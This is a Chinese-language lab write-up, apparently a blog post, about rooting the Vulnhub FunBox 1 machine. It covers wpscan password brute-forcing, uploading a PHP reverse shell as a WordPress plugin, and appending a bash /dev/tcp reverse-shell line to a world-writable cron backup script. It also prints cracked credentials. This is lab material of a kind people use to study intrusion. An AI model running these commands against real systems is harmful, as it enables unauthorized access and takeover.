Vulnhub靶机:FunBox 1

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:FunBox 1(10.0.2.26)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.26

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:21、22、80

在这里插入图片描述

打开网站,访问ip会跳转到funbox.fritz.box域名,修改hosts文件,vim /etc/hosts添加一条数据,再次访问网站

10.0.2.26         funbox.fritz.box

在这里插入图片描述
在这里插入图片描述

使用dirsearch爆破目录,发现网站为wordpress模板搭建的

在这里插入图片描述

三、漏洞利用

直接使用wordpress扫描器wpscan进行扫描

wpscan --url http://funbox.fritz.box/ --enumerate u,p,t --plugins-detection aggressive --detection-mode aggressive

在这里插入图片描述

枚举到两个用户名:joe、admin,使用wpscan对这两个用户进行暴力破解

wpscan --url http://funbox.fritz.box/ -P /usr/share/wordlists/rockyou.txt -U user.txt -t 100  

在这里插入图片描述

破解成功:joe\12345、admin\iubire

登录admin账户

在这里插入图片描述

直接在安装Plugin处上传php-reverse-shell.php文件,无需压缩,可能没有返回成功上传的提示,但是到/wp-content/uploads即可看到所上传的文件

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

获取shell

在这里插入图片描述

使用python获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

访问home目录可以看到有两个用户,funny和joe

在这里插入图片描述

看到joe用户,想到使用wpscan暴力破解的得到的:joe\12345,是不是可以用这个用户名密码登录joe的ssh呢,登录ssh,登录成功

在这里插入图片描述

好吧,发现joe用户cd命令受限,还是使用web漏洞得到的shell吧

在这里插入图片描述

在joe的home目录下发现一个mbox文件,查看是一个邮件信息

嗨,joe,请告诉funny备份脚本已经完成。

在这里插入图片描述

在这里插入图片描述

可查看funny的home目录,有一个.backup.sh备份脚本,所有用户都具有读写执行权限

在这里插入图片描述

查看备份脚本,该脚本会把/var/www/html目录备份

在这里插入图片描述

仔细观察发现funny目录下的html.tar创建时间会随着时间变化而变化,可猜测funny用户对备份脚本创建了计划任务,每分钟备份一次

在这里插入图片描述
在这里插入图片描述

我们可以在备份脚本写入反弹shell命令,来获取shell

echo "bash -i >& /dev/tcp/10.0.2.15/8888 0>&1" >> /home/funny/.backup.sh

在这里插入图片描述

耐心等待,反弹shell成功

在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

发现获取的shell为funny的shell,找了一圈,没有发现获取root权限的方法

上传pspy64查看靶机的进程,有一个root的计划任务和funny的计划任务,root是5分钟执行一次,funny用户是2分钟执行一次

在这里插入图片描述

重新监听,多监听几次,成功拿到root权限shell

在这里插入图片描述

获取flag

在这里插入图片描述

参考链接:vulnhub-wp-funbox1 - rightevil - 博客园 (cnblogs.com)

  • 27
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值